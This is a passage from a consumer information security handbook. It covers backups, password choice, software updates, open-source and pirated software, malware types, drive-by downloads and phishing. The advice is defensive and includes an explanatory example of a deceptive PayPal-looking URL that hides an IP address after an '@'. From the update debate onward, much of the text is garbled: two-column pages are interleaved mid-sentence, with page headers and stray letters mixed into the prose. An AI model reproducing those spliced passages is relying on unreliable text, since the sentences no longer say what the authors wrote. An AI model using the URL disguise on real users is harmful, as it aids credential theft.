b) If you have a lot of personal data, you may consider backing it all up periodically and, at more frequent intervals, backing up only the files that have changed since the last full backup. This is called an incremental backup. In this case, to restore a file or files, you will need the last full backup plus the last incremental backup. (That holds because each incremental, as defined here, contains everything changed since the last full backup. If your utility instead records only what changed since the previous incremental, you need the full backup plus every incremental made since it, applied in order.)

There are other variations of these backup methods. Typically, backup utilities offer advice in their instructions on how to use their products.

Where should I keep my backup copies?

The answer to this depends on how you may use the backups. If you are trying to protect your system from theft or fire, the backups must not be stored near your computer system. Ideally, they should be located far enough away that natural or man-made disasters affecting the system do not affect the backups. However, if you will use your backups for recovering data that has been deleted or altered accidentally, then you will want to keep them in a more convenient location.

One solution is to keep the full backups off site and incremental backups nearby. Another is to keep the most recent data backup nearby and a less recent copy off site. Some people make two copies of every backup, so they can keep one full copy on site, and one farther away.

Remember, if you have data on your computer that someone may want to steal, they can steal it from the backup as well. So it is important to protect the physical security of your backup, just as you protect the computer itself.

Will I be able to read the backup?

There are a number of reasons that you may not be able to read a backup when you need it. Among them are:

· The copy is too old or is physically damaged. This is most likely to occur with floppy disks or other magnetic media.
· The device that wrote it was poorly adjusted and therefore what was written cannot be read. In this case, it may be readable by the same device that wrote it.
· Media failure. Media failure was common on old floppy disks. It was not unusual to create a disk that could not be read, even a few days later. Optical disks (such as CD-Rs) have been thought of as extremely stable. However, a recent study of CD-R reliability has indicated that lower quality CD-Rs may not be readable in as little as two years after they are written.

It is always good practice to try to read a backup, preferably on a different device than the one that wrote it, to ensure that it is readable. If you write backups to removable magnetic disks (floppy, zip), make sure they are clean and reasonably new.

Some people keep their backups for a long time. It is amazing how often you really want to reuse a copy of a document or image or program that you had several years ago. If you keep backups for a very long time, you will need to consider the possibility of media obsolescence. The data stored on a 5¼" floppy disk from the 1980s may still be there, but will you be able to find a computer with a 5¼" floppy drive?

How many copies should I keep?

Let's say that you make a backup once a week, so if you have some catastrophic failure, you will not lose more than one week's work. These backups are good from a security standpoint, but over time they will take up space. How many of these backups should you keep? If you are using CD-Rs as the backup media, there is no reason to discard them quickly, as they are small and cannot be reused. If you are using magnetic disks or CD-RW, then they can be reused. But you should always keep several backup copies. In the above example, you might keep the most recent four copies.

Why is this good practice? What possible reason would there be to keep the copies from the past month when you have the more up-to-date copy from last week? The reason is simple: it is always possible that the copy you made most recently is bad or will be lost, or stolen. The copies from last month are not as complete, but they are better than nothing. This is another example of how good security is composed of multiple, partially redundant measures.

Backing up purchased software

If the license allows it, always make a copy of software CD-ROMs and use the backup for routine installation and maintenance operations.

The most important thing about backups

The most important thing about backups is that you create them regularly. Many people avoid the trouble of making backups. They may have even suffered previous losses due to insufficient backups, but they feel that they will not get hit again. Avoid risk and make regular backups!

Authentication

Authentication allows your computer or a distant web site to know who you are. It also should prevent other people from pretending they are you. Typically, you will be known by a user identification and password, although there are many variations on this theme. The challenge is to make your user identification and password combination hard to guess, so that attackers cannot figure it out. At the same time, it should be memorable enough so that you don't forget it or feel the need to write it down next to the computer. If you use computers and the web frequently, you will have many usernames and passwords. If they are all written in an obvious place near your computer, the usernames and passwords are not very secure.

User Identification

Most systems that want to identify you will either assign or ask you to select a "User Identification." It goes by many names: username, userid, member number, member name, etc. In this discussion, we will use the term username. Some systems will use your e-mail address as your username. In fact, your e-mail address is a specific example of a username. Systems often have rules about how the username should be composed.

· Some systems limit the length of the username; for other systems, the length is effectively unlimited.
· In some cases, any printable character is allowed in the username. In others, you may be limited to letters and numbers and perhaps a few punctuation marks.
· Some systems ignore upper and lower case, while others treat them as different characters (an "A" is not the same as an "a").

If the system or web site does not give you a choice, then it will decide what your username is and you will be required to use this name. However, in the cases where you can select your own username, what are the criteria that you should consider? Sometimes, there are competing criteria, not all of which can be met at the same time.

· Do you want your username to reveal who you really are? Will this username be used to help your friends and colleagues recognize you? An e-mail address is often such a username.
· Do you want the username to help conceal your true identity? If you are using this name to participate in some group activity (such as an online game or chat group), you might not want people to know who you really are.
· Do you want this username to be easy for you to remember? If it is a username for some online service that you visit infrequently, you might want to pick a username that you will not forget. Some people use the same username for many services, if there is no critical or valuable information associated with these services.
· Do you want this username to be difficult for other people to guess? If it is the username to access your bank account, you might want to make it difficult for others to guess what it is (this goes back to the concept that effective security is made up of multiple, partially redundant layers; if you use your publicly known e-mail address to access your bank, it makes it easier for a thief to "guess" your bank username).

Passwords

Rule 3: Select passwords that you will be able to remember but will be very difficult for someone else to guess.

Although usernames are often given to you without offering you a choice, or are likely to be publicly known (such as your e-mail address), passwords can nearly always be set by you. Their form should make it difficult for an unauthorized person to access your account.

When passwords are stored on the host system, they are usually encrypted, so someone looking at the disk cannot see your password. In some cases, they can be decrypted by someone who knows the key. In other cases, it is not possible to decrypt the password (one-way encryption, more precisely a one-way hash function); when you enter a password while logging on, it is encrypted and compared to the version on disk (see Addendum 1 on Encryption for more details).

Due to poor security on some host systems, at times it may be possible for attackers to access the entire password table and find the encrypted passwords for all users. Even if these passwords use one-way encryption and cannot be decrypted, it may still be possible for the attacker to determine what your password is. The encryption algorithm used for these passwords is typically documented and known. The attacker could use this algorithm to encrypt all the words in a dictionary, as well as other commonly used passwords. So if you used the word "birthday" as your password, when the attacker encrypted the word "birthday," he would find that the encrypted version is the same as what is on disk and would now know your password! Systems that mix a random per-user value (a "salt") into the stored form defeat a precomputed list of encrypted words, but the attacker can simply repeat the dictionary run for each user, so the advice below still applies.

Since the whole idea of passwords is to make it difficult for someone to guess, but to allow you to sign on at will, one can state a number of criteria and techniques associated with robust passwords. Like usernames, each system has certain rules regarding the password formats (minimum and maximum size, what characters are valid, etc.).

· Never use single words in your native language (or English) as a password. A phrase or a sentence, or several word fragments, is much better.
· If the system treats upper and lower case as different letters, use both, and do not place them where they would be used in normal writing.
· Mix numbers, allowed punctuation, and blank spaces, if the system allows it.
· If the system allows blank spaces and your password is a phrase, consider omitting some of the spaces (that is, have the words run together).
· To make your passwords easy to remember, you may be tempted to use the same password for many systems. If you do this, remember that once an attacker discovers your password on one of these systems, he or she can make a pretty good guess that it is the password on your other systems, so only do this for systems where you have absolutely nothing to protect. For example, some newspapers require a username and password to read articles on their web site. No money or confidential information is involved, they just want you to log on, and so it may be all right to use the same password for newspapers and similar reading material.
· Some people replace letters in words with similar looking numbers or punctuation. They use the digit "1" for the letters "I" or "L", the number "3" or the symbol "#" for the letter "E", the digit "0" for the letter "O", the symbol "@" for the letter "A" and the digit "5" for the letter "S." This is a useful artifice, but remember, a good attacker knows about these tricks; they make his job a little bit harder, but not impossible.
· Replace the letter "I" with the string "eye" or "aye" or whatever makes sense in your language. This works particularly well with words like "icon", which is now "eyecon."
· Use acronyms (the first letters of the words in some familiar expression). For example, "tgbwc" is an acronym for the Coca Cola slogan "Things go better with Coke."
· Spelling words backwards slightly obscures the words but does not make them much harder to crack.
· Never use:
  o Your username, or some variation of it
  o Your name
  o Your maiden name
  o Your spouse's name or maiden name
  o Your children's names
  o Your parents' names
  o Your pet's names
  o Your co-worker's, boss's or friends' names
  o Your birthday, or the birthday of any of your friends or relatives
  o Your address, phone number, license plate number or similar identifiers
  o Your favorite color
  o Your job title or rank
  o Your company name or school name
  o Anything else that is commonly identified with you
  o Classic passwords such as "xyzzy" or "plover" (magic words from the early text adventure game Colossal Cave Adventure), "abracadabra" and "open sesame"
  o Words in popular movies, news or literature. Examples are "Harry Potter", "Lord of the Rings", and "Gone with the Wind".
  o Letters on the keyboard in order (such as "SDFGHJ")
  o Adding a single digit before or after any of the above
  o Repetitions of the same letters or numbers, or in sequence ("aaaa9999", "123456", "ABCDEFG")
· Some systems require a minimum number of characters in a password or a certain number of letters and/or digits. Although long is good, as is mixed case, if you are not a very good typist, think about whether someone looking over your shoulder will be able to figure out what you are typing.
· Whatever the password is, you will have to remember it, preferably without writing it down. If you need to write down a password, never write it near where it will be used, or with a label on it identifying it as a password.
· Never keep an unencrypted list of passwords in a computer file.

The best password is a very long string of random numbers and letters. However, for most of us, this would be impossible to remember, and a password that is written on a note on your computer screen or under your keyboard is not secure.

Here are some examples of reasonable passwords (for a system that accepts letters, numbers, special symbols and blanks, and treats upper and lower case as different letters) along with variations of each. They are memorable and yet not easily guessed or found in a dictionary.

Password                  Comment
Computers Are Useful      Something many computer users will agree with.
Computers aReuseFul       One blank missing, funny capitalization.
C0mputer5@reus#fv1        Digit 0 for letter O, 5 for s, @ for a, # for e, v for u, 1 for l, no blanks.
comp9uter8sare7usef6ul    The original expression, with no blanks and with digits interspersed every four characters.
comutrsareusful           The original expression with a few letters missing.
onupatithwa               In many countries where there is a tradition of story telling, there are standard forms for beginning the story. In English speaking areas, children's stories often began: "Once upon a time, there was ...." In this example, each word is truncated to two letters to limit the length, which makes it less recognizable than "onceuponatimetherewas".
oNup@T-1thuua             The same thing, but with some substitutions, upper case letters, and arbitrary punctuation inserted.

Changing your Password

Passwords should be changed periodically. The frequency of changes is the subject of debate. Some security specialists recommend changing passwords very often, but others argue that making changes too frequently increases the need to write passwords down or pick simplistic passwords. For typical applications, the following recommendations are realistic:

· Change your password immediately if you think that it may have been compromised.
· If you give your password to someone else for any reason, change it immediately after they are finished. Sharing passwords is generally a bad thing, and should be avoided unless there is no alternative.
· Change your password periodically, just in case it has been compromised. "Periodically" is subjective, but between six months and a year is reasonable.
· If you belong to an organization that has a more stringent policy, follow it.

Restrict Privileges

Most systems allow users to be given a restricted set of privileges; this set may not include all the privileges granted to the person who administers the computer. For computers where the user is also the administrator (as is the case for many personal computers), the user often does all of his/her work using the full set of privileges (often called root or administrator privileges). It is good practice to use a separate username when non-administrative work is being done. This reduces the chances that the user will damage the system by accident. It also reduces the chance that if the system is penetrated, the attacker will have full administrator privileges.

CHAPTER 4. KEEPING YOUR OPERATING SYSTEM AND APPLICATION SOFTWARE SECURE

At a Glance

This chapter investigates techniques you can use to reduce the chances that your operating system and application software are vulnerable to security breaches.

Introduction

Principle 1: Computers run programs.
Principle 2: Programs have bugs.

Principle 1 is obvious. Given that people write programs and people are not perfect, Principle 2 is expected. It is not clear, however, why there are so many security-related bugs. Problems such as buffer overflows (see definitions in Addendum 3) are easy to avoid; nevertheless, they seem to be involved in almost half of all known security bugs.

Commercial Software

How does it normally work?

Several years ago, when you bought PC-type software, that was it; no updates were available until you bought the next version. Now most software is updated regularly, particularly for security problems. For some software such as operating systems, "regularly" means almost daily.25 For most products, there is no charge for updates.

Many companies that offer commercial software also provide some updates to address bugs in general, and security vulnerabilities in particular. In the case of larger vendors, you can go to the corporate web site, click on a "support" or "downloads" tab and find any available fixes for their products.

Typically, when you go to a software supplier's web site, you identify what software packages and versions you have and they will list what updates are available. In some cases, it is completely clear what updates are relevant for your computer; in other cases the choices are less obvious. Once you have decided what updates you need, you download them onto your computer. The next step is to apply the update. Depending on the software, this may mean running the program that you have just downloaded or following the steps outlined in the accompanying documentation or instructions. In some cases, once the update is downloaded, it will install itself automatically.

In recent years, there have been three new trends:

1. For complex programs such as Microsoft Windows, Microsoft provides software via their web site ("Windows Update"). An applet inspects your computer and gives you a list of updates that apply to your system. You can then download and install these updates as described above.

2. The update that you find and install as described is not really the actual update, but a program that will, while it is running, download and install the actual update. So, for instance, you might find that there is a major update to one of your programs. When you look at it you will see that it is only 500,000 bytes – really small for a software update. In fact, this is just the program that will download the real upgrade and install it – the real upgrade consisting of perhaps 30,000,000 bytes.

3. Some programs have built-in functions that will dynamically check to see if updates are available and may even install them (with your permission). These capabilities were designed to make your life easier. In all cases, the task of selecting exactly what updates you need (a complex task for operating systems and certain applications) is completed for you by the programs.

25 In October 2003, following a severe security problem related to a problem in Microsoft Windows, Microsoft decided that it was unreasonable and unrealistic to have users apply patches weekly, and that in the future, they would only issue monthly updates unless a problem was severe and urgent.

The developing country conundrum

As you can see, many of these processes are designed to run online and typically involve downloading many megabytes of updates. That works well if you have a high-speed connection to the Internet (greater than 1 megabit per second), or a dialup connection where you can remain connected for several hours. In developing countries, however, this is often not the case. There are two alternatives to address this problem:

1. Don't update your system and applications.
2. Have someone else download the update and provide detailed instructions for how to install it. The update can be distributed on CD or via a local area network, if there is one.

The first alternative is not acceptable given the rise in security risks. So, the only reasonable alternative is to work cooperatively to download and share the updates. There are several vehicles for doing this:

· If an organization owns multiple machines, a local technical support person should take responsibility for downloading updates and installing them or making them available to others.
· Computer clubs or other groups could download updates and make them available to their members.
· For individual users, Internet Service Providers (ISPs) could offer a service whereby they get the updates for popular products and common operating systems and distribute them locally. This could also reduce the ISP's requirement for international bandwidth, reducing their costs.
· Computer stores that sell the machines can make the updates available to their customers.
· During a flurry of computer worm vulnerabilities in 2003, Microsoft began distributing some updates on CDs locally in various countries. Perhaps this practice will be continued.

The last three types of software update distribution are not prevalent, but given the increased need to keep soft-

... reliable and trustworthy, they could become a way to distribute Trojans and viruses.

Should you install updates as soon as they are available?

This has been a debate among computer professionals for decades. The two arguments are:

Pro: If you install updates immediately, you protect yourself from failures that are already known. In the case of security-related updates, you will protect yourself from penetrations and exposures that the original system allowed.

Con: Any time programmers write code, they can make mistakes or break some other part of the program. This applies to updates as well as to the original programs, so there is a chance that the update will introduce new problems that are unrelated to the problems it is designed to fix.

The problem of attackers and criminals using security flaws to penetrate systems and alter or destroy data has changed the scope of the problem. Once a security flaw is announced, even if the announcement comes with a patch, attackers will immediately create viruses and other tools to exploit the problem. Those who do not implement security fixes quickly may be compromised.

Today's conventional wisdom:

· Novice users and those who use their computers for non-critical tasks should apply all updates soon after they are available. The risk of introducing new problems through the updates is lower than the risk of having a seriously out-of-date machine.
· Sophisticated users and technical administrative staff should install security-related updates immediately, but they can defer larger overall upgrades that may have multiple functional changes in them.
Delaying for a few weeks or months may ware up to date, they may become a sensible commercial allow more adventurous users to install the upgrades, strategy for ISPs and vendors in the developing world. discover the problems, and report them, giving the Although this will be a welcome support strategy for manufacturer an opportunity to fix the flaws before users, they will need to ensure that the source of these you install the overall upgrade on your system. local updates is reliable and trustworthy. If they are not Information Technology Security Handbook SECURITY FOR INDIVIDUALS 45 If your computers are used for business applications, support, even though the original software was free. it is always a good policy to test all changes and new Red Hat's version of Linux, which is available both software on an identical, but non-critical computer for free and through commercial vendors, is a good before applying them to your production machines. example. Organizations that desire a higher level of You can never tell when a change will stop an existing technical support may find it worthwhile to purchase application from working properly. the package or at least the services to support it.26 It is important to note that, as with some free software, Non-traditional and non-commercial if you decide to use the software at no charge and with- software out paid support, the period for which security fixes are available may be quite short. Therefore, if you select The previous discussion focused mainly on commercial non-support software for your operating system or other P offerings including operating systems and major critical sub-systems, you may need to upgrade to new ART applications that are common to many computing versions very often (perhaps as every six months). environments. How does the situation change with other types of software? 
The update processes for Open Source products tend to be more difficult that those for Windows, but are TW Shareware and small-supplier commercial software in line with other Unix products and the installation procedures for the original Open Source products. O There is a vast amount of software that is offered for There are Open Source Windows-based products that free, or for a modest cost. The level of support offered by distribute binaries and use simple installers as well. suppliers varies enormously. In general, upgrades are offered periodically, either for free or for a small fee. As with Windows-type systems, updates and patches These programs do not tend to have security for large Open Source systems are sizable themselves. exposures, so their upgrades are aimed at fixing It is important to identify local sources of these updates non-security flaws or adding functionality; as such to reduce Internet download times for individual users. they are beyond the focus of this book. However, some freeware applications, such as firewalls and One final issue related to Open Source software is worth virus checkers do fall in our domain and will be some discussion. There is an ongoing debate between discussed later in this book. advocates of Open Source and advocates of traditional proprietary software regarding which product is more If you use programs that have clear security secure. implications, make sure you understand what the supplier's upgrade policy is. You do not want to be Proprietary software advocates say: in a position where you are using security-sensitive software and the upgrade support suddenly disappears · since the source is available for Open Source products, or you cannot afford to buy it. 
Deploying software attackers can easily analyze the code and locate all of such as a virus checker that is not regularly the flaws which they can exploit; (daily or weekly) updated may be more dangerous than not using one at all, because if you use it, · since a large number of people in different locations you may be working under a false sense of security. and without organizational ties may be working on a given Open Source product, standards may be lax and Open Source software the uneven integration of the various components may cause security vulnerabilities; Open Source software that is in active development tends to be well supported. In some cases, there may be fee- based services available for upgrades and 26See selected links on Linux and other Open Source projects in the Annex on Electronic Resources. 46 INFORMATION SECURITY AND GOVERNMENT POLICIES · since the people working on proprietary products are 1) It is possible that pirated software may not paid by the manufacturer, they follow instructions and be updateable, or that an update may stop it the quality is uniform (and high); from working. 2) Some pirated software includes other "goodies" · since no single authority is responsible for some Open that you may not have expected. These can include Source products, security could be ignored if it does backdoors, keyboard loggers or other malicious not happen to be important to any of the individual software. developers. Open Source advocates say: · since so many people are working on the source, problems tend to be recognized by the "good guys" and fixed quickly; · the people working on proprietary products may generate uniform quality code, but it may not be secure if the manufacturer does not value security highly; · with proprietary programs, you are at the mercy of the manufacturer to fix problems, and that may cause long delays. In fact, each of these arguments has some validity to it. 
There is no way to ensure that either proprietary or Open Source software is secure or that problems will be discovered and fixed in a timely manner. In both types of software, there are examples of exemplary behavior and of careless behavior on the part of their respective designers and support organizations. Pirated Software Neither the authors nor the publisher of this book advocate software piracy, but it would be foolish to pretend that it does not exist. Software piracy is a problem throughout the world, but it is particularly relevant in countries where the relative cost of legitimate software compared to wages far exceeds that in developed countries and where local laws and law enforcement make punishment highly unlikely. Aside from the potential for legal liability due to violating the product owner's property rights, there are two issues related to security and pirated software that must be addressed. Neither is very common, but both are possible. Information Technology Security Handbook SECURITY FOR INDIVIDUALS 47 CHAPTER 5. it a program and run that program. MALICIOUS SOFTWARE Some malware detection vendors consider a worm a type of virus. At a Glance Trojan This type of software is named after the (perhaps mythical) Greek conquest of The concept of malicious software is introduced. Troy, where the Greeks presented the city The various types of malicious software (such as viruses, of Troy with a large wooden horse. worms and Trojans) are discussed and the mechanisms When the horse was brought into the city, used to spread them are investigated. it was found to contain Greek soldiers Introduction who proceeded to take over the city. P Since then, a "Trojan Horse" has meant ART something that looks benign, but contains Malware some hidden and potentially dangerous Definition: Short for malicious software. Software content. designed specifically to damage or disrupt a system. 
TW A Trojan horse program is one that The first known microcomputer virus dates back to 1981. can do something malicious in addition O The concept of a computer worm was introduced in a sci- or instead of what the person thinks it is ence fiction book in 1975, and the first actual implemen- doing. The term has recently also come to tations were in the early 1980s. Interestingly, these mean any malicious program that is added worms were designed to do good things instead of mali- to your system without your knowledge or cious things. Computer Trojan Horses date back to the authorization. early days of time-sharing (1960s). Despite their long history, it is only in recent years that their impact on "Bonus" This is software that is included in normal users has been so severe and potentially software some other package without your dangerous. knowledge. It is common for commercial software to include other packages. To begin, we should first define what these terms mean.27 For instance if you install a web browser, it may also include Adobe Acrobat© or Virus A virus is a program that is attached software that plays music or videos. to or inserted into another program. When that program runs, the virus also These are included because they enhance runs and it inserts copies of itself into the original package and usually the other files or disks. In this way, install process asks you if you want them, it replicates itself. When the program or at least informs you that they are it infected runs, the whole process starts being installed. Bonus software is over again. The virus may or may not different because it is not really related do other things. to the original package in function. Given a choice, you probably would Worm A worm is similar to a virus, in that it not install it. replicates itself, but it does not need a host program. Like a virus, a worm may The terms Trojan, Virus and Worm are not mutually exclu- only replicate itself or it may take other sive. 
Attackers can write software with the characteristics actions as well. A worm can only work if of more than one, such as a self-replicating Trojan. there is some capability in a system that Software that has the characteristics of more than one form will allow an external source to send of malware is often called a blended threat. As you can 27See www.rbs2.com/cvirus.htm for further information on viruses and other potentially malicious programs. 48 INFORMATION SECURITY AND GOVERNMENT POLICIES see, the terms generally refer to how the malware is spread, image of your signature to allow you to print or fax and not what it does. This chapter describes what malware letters, this may also be useful. Together these pieces does and the specific ways in which it is propagated. The of information could allow the attacker to assume your following chapters discuss ways in which your computers identity. Alternatively, if you operate a small business and networks can be secured against such software. and store other people's credit card numbers on your computer, it will be a serious problem for you if these What do they do? numbers are stolen. There is no limit to how malware acts once it is running Over-write or erase data on your computer, but the programs do have some common characteristics in their activities: Some malware programs are truly malicious; upon entry to your computer, they can immediately begin to erase Send e-mail all the files on your hard disk or overwrite the files with garbage. Sometimes they change things in less Sending e-mail is one of the most common actions of detectable ways including: malware programs. The e-mail may include a copy of the program itself (a virus or a worm) as an attachment. The Installing a Trojan content may be specific to the malware (such as falsely claiming it is an alert from Microsoft warning you about This aspect of malware is becoming increasingly common. 
a security problem) or it may even be random parts of One or more programs may be installed on your computer. your previous e-mails that it finds lying around your The program may replace some common program that computer. If there is a malicious attachment included, you or the operating system normally use (the original the text of the message may be something that will meaning of Trojan). Alternatively, it may insert some encourage the recipient to open the attachment. The other program that will be invoked either at some pre- Subject: and the From: line are similarly set according to determined time or whenever your computer is started. the whim of the malware; they too may be set to The following section on Payload Software describes encourage you to open the attachment (as in the famous many of these programs. worm that said "I LOVE YOU" in the subject line). The messages are typically sent to people it finds in your Scheduling something to happen later address book or to people whose e-mail addresses are in other types of files on your computer. Sometimes when Any of the previous actions may happen immediately or messages have been sent to all possible recipients the they may be triggered at a later date. Malware writers program stops and sometimes it will start all over again! seem to like the suspense that comes with the Note that if someone else's computer is infected with a announcement that a certain worm will do something virus or worm that sends e-mail and it puts your address nasty on January 1, 2000, for instance in the From: line (because it found your address some- where on the infected machine, perhaps in its address Payload Software book), you may be accused of distributing this virus. Malware often comes in the form of programs left on Gather information your computer that run when you start your machine or when you start a particular program. 
The type Malware may gather information about your computer of program is only limited by the imagination and and its files and send this information back to its programming skill of the attacker. author. Since it can read any files on your computer (often including encrypted files), whatever you have is Web tracking/modification software fair game. If you store information about your bank accounts or credit cards on your computer, this data This class of programs watches what sites you visit, may be of interest to an attacker. If you have a scanned can display pop-up ads in addition to those you would Information Technology Security Handbook SECURITY FOR INDIVIDUALS 49 normally see, and can display ads replacing those that Keyboard loggers the site you are visiting is sending. They can send information about your computer and what you are Keyboard loggers do just what the name implies. They doing back to its developer. In many cases, the software trap all keyboard input and log it to disk. The file can will also have full control over your browser, watches be inspected later, perhaps via backdoor access, or it what you enter, and may alter what you see. When it can be sent back to the person who installed the watches what you enter, it can report these entries to program via e-mail or web delivery. its developer. For Internet Explorer, this capability is designed into the product and called a Browser Helper It is important to note that keyboard loggers watch Object (BHO) - http://msdn.microsoft.com/library/en- what you are actually typing, not what is sent over the us/dnwebgen/ html/bho.asp. Although one can build network. So if you enter a credit card number on a web P very useful and legitimate BHOs, there are also clearly page that is secure (uses encryption when the data is ART opportunities for less than ethical applications. transmitted), the logger still sees exactly what you typed in unencrypted form. 
Backdoor Software Financial Theft TW Normally to access a computer system, you need to give it a username and password, although this security Most thefts that are the result of personal computer O if often by-passed for systems that are thought of as attacks involve information that is taken from the being physically secure and used only in front of their computer. However, there are cases where payload own keyboard and monitor. Backdoor software allows a programs actually spend your money automatically. remote user to access your computer bypassing all of The simplest example is if the program detects a modem your security. It may even install its own security to on your computer and uses it to place long distance allow only that attacker to use it. Although the details calls. Since the program cannot talk, there is no benefit vary from case to case, this remote user will now have to the attacker, other than the malicious satisfaction in full control of your system; they could even lock you knowing that at the end of the month, you will get an out if they wished. In essence, your computer has been outrageous bill from the phone company. hijacked and you will not realize it. Why does this attacker want access to your system? The reasons vary, In other cases, the attacker can benefit personally. but they may include: In many countries, it is possible to arrange to have a special telephone number ­ when this number is called, · No reason other than to prove to himself or his the phone company will charge the caller a specific friends that he could do it; amount per minute and part of that money goes to the · To be malicious ­ in general; person being called. It is used for a variety of businesses, · To be malicious ­ he has some specific reason to but examples are software companies that want an easy target you; way of charging you when you call them for out-of-war- · To use your computer for some other activity such ranty support. 
In that case, the phone company collects as sending spam or launching a denial of service the money from the caller and sends part of it to the attack later; company being called to pay for the support call. If an · To steal something of value from your system. attacker had such a number, they could program your computer to call the number and just hold the line open Note that this same type of software, under names for a while. Your telephone bill would reflect this charge. such as remote access or remote administration tools has very legitimate, practical applications as well. If you use these tools for work, make sure that you have proper security measures employed, including usernames and passwords. 50 INFORMATION SECURITY AND GOVERNMENT POLICIES How do you get them? e-mail, however, that HTML can include instructions that cause problems. For example, the HTML can also A number of years ago, the only way a PC or Macintosh direct a web browser to go to a specific web site that user could be the recipient of a virus or other malware may not be appropriate for you or your children. was to use an infected diskette. If you didn't trade files It should be noted that the people who send these with people who were infected, you were safe. Unix sys- e-mails can be very innovative. Recently, there have tems were not particularly prone to viruses, but with been a number of virus-loaded e-mails that claim to their superior connectivity capabilities (even in those be from Microsoft and say that they are providing the days), security holes in operating systems and some latest patches to protect you from viruses and worms. common applications occasionally allowed attackers to They contain logos and images that could easily con- access systems and install backdoor software. The vince someone that they are authentic and that the Internet's first major security incident was a worm that attachments should be run immediately. Needless to say, attacked Unix systems in 1988. 
Today, you can be anyone who does run such an attachment is in for trouble. attacked in a number of ways. All of the following apply to Windows machines. Unix and Macintosh systems are Web sites somewhat less prone to these types of attack, not nec- essarily because they are more secure, but rather When the World Wide Web was launched, web pages because the vast number of Windows machines makes contained text and images. Now they can contain far them more interesting targets.28 Unix systems are next more, including dynamic programs that are downloaded in line, with Macintosh exhibiting the fewest exploited onto your machine and executed (Javascript, Java, vulnerabilities to date. ActiveX). If you allow your browser to run these pro- grams without determining that the sending site is e-mail completely trustworthy, then there is a good chance that the program may do something objectionable. A few years ago, rumors would spread periodically that Javascript is generally safe, but Java and ActiveX are you could be infected with a virus by receiving e-mail. potentially quite dangerous. Browsers can usually be System managers and helpdesk people would have to set to refuse these programs or to ask the user before reassure their users that this was impossible. As long as executing one. a user did not run a program that he or she received in an attachment without verifying that it was safe, the Plug-ins and Add-ons machine and the user were OK. Web browsers and many other programs (including word It is no longer impossible to be infected via e-mail, in processors and spreadsheets) allow other programs to fact, it is highly likely. Two enhancements brought this be loaded and executed from within the main program. about. The first change is that we now have e-mail A common example is the Adobe Acrobat Reader" programs that can run attachments automatically. which allows you to view PDF files while browsing the web. 
Once these add-ins or plug-ins are installed, Originally, a user would have to save the attachment they can do anything that the base program can do, and then run it. Now, automatically running attach- including (usually) read and write on disk, or use your ments makes things easier, particularly for the novice network connection. Add-ins and plug-ins should only user who wants to see what was sent without taking be installed if the source is known to be trustworthy. additional actions. The second change is that in an effort to make e-mail prettier and more powerful, we now allow HTML programming within the body of the 28Typically, a virus, worm or Trojan written for Unix may work only on the variant (Red Hat, Solaris, etc.) that it was written for, because the libraries that interface applications to the operating system differ on each type of Unix. As Linux becomes more popular and standardized, this advantage will be reduced. Information Technology Security Handbook SECURITY FOR INDIVIDUALS 51 Security holes Piggy-back on legitimate software Security holes are bugs in parts of the operating system or Although most software that you download is probably other system components that allow an attacker to access legitimate, it is increasingly likely that downloaded information on your system, or to gain control of the sys- software (particularly freeware) will install other tem. In recent years, most suppliers are reasonably quick programs as well. Peer-to-peer file sharing programs to respond to security problems that are discovered in have been particularly prone to this. They often include their systems, so if you apply patches to your system reg- other programs, many in the Web tracking/modification ularly, you may plug the holes before would-be attackers category, which monitor your web activity, display adver- build and distribute software exploiting the known bugs. tisements, and report on your activities to their masters. 
Some of these programs are particularly insidious in that P File sharing they try to disguise themselves and they are almost ART impossible to remove. One such program includes File sharing is available in one form or another for a uninstall utility; if you run it, it deletes the uninstaller all operating systems. It is very convenient to share but the original program is still alive and running! files among co-workers. If you have several machines of TW your own, sharing files between them is a great feature. Non-resident Malware However, if you allow file sharing over the Internet and O you don't apply adequate security measures (such as Not all malware runs on your computer. It is becoming robust usernames and passwords and limiting write and increasingly common to send e-mail that somehow update privileges) then any attacker in the world can entices the user to visit a web site. The traditional form also share your files. Further, if you allow others to of this trap is when an e-mail offers you something that write to your disks, then the attacker can set up your is of interest to you (just as with any of the common machine to do anything they want! spam sales e-mails), but once you go to their site, some sort of malicious software takes over, perhaps downloading Drive-by downloads software (what is referred to as a drive-by download) or taking other actions. Drive-by downloads occur when you innocently go to a web site and the HTML statements on the page automatically In the newer form, the e-mail claims to be from e-Bay invoke a Java or ActiveX program that downloads another (the Internet auction site) or PayPal (Internet pay- program and either executes it or schedules it for later ments) or from your bank. The e-mails are crafted to execution. The HTML code can also arrive in e-mail. If really look like they are authentic. 
They point you to a you allow Java or ActiveX programs to execute, they can web site to (typically) re-validate your credit card num- download and install whatever they want, without asking bers. The URLs that they point you to look exactly like your permission and without telling you what is happening. an authentic URL to the casual user. For instance, the real URL for PayPal is www.paypal.com. The URL which Piggy-back on pirated software displays in the e-mail might be exactly that. However, what is shown on the screen is not the actual URL that Pirated commercial software is not new. Counterfeit CDs will be used to access the web. The actual URL pointed have been sold for years and copies on the Internet to is often hidden and might be something like: (called Warez) are common. There has long been a http://www.paypal.com:user=32454329:transac- problem that the CDs could have a virus, but there tion=43293:code=4333033.33@218.5.79.162. is now an increasing chance that the software may deliberately include altered code giving access to If one is not very familiar with URL formats, it really your computer to an unauthorized person over the looks like it is going to www.paypal.com, so it must be Internet. Since administrator privileges are needed authentic. In fact, all of the data prior to the @ sign is to install most software, it is an ideal opportunity to ignored, and this goes to site 218.5.79.162. At that add a few more programs that you had not requested. site, you would see a page that looks exactly like the 52 INFORMATION SECURITY AND GOVERNMENT POLICIES PayPal site, asking you to log in and re-enter your credit card number. In fact, this site is not connected to PayPal at all, but rather belongs to someone who is trying to steal your credit card information. These ploys have been very successful. Note that e-mails similar to this may be legitimate. 
A legitimate e-mail will usually include some information unique to you (and not derivable from your e-mail address), such as your full name or the last four digits of your credit card. If it directs you to a web site, it will either tell you where to go without including a hyperlink, or the resulting web page will also include information that no spammer or fraud artist could know. If in any doubt, contact the company by telephone at its normal number (not one included in the e-mail).

Information Technology Security Handbook SECURITY FOR INDIVIDUALS 53

CHAPTER 6. SECURING SERVICES OVER NETWORKS

At a Glance

E-mail and the Web are the primary applications on the Internet. This chapter describes them in detail, investigating how they work and how careless use can result in security breaches. Other security-sensitive network-related topics covered include wireless communications, file sharing, and instant messaging.

General Issues

You should apply security patches for your software regularly. Although security problems can hurt you in many ways, you are most vulnerable when connected to the Internet. If there is a security hole in your operating system or an application, you can be sure that attackers know about it and will design ways to use it to infiltrate your computer.

Rule 4: Keep your operating system and key application software up-to-date.

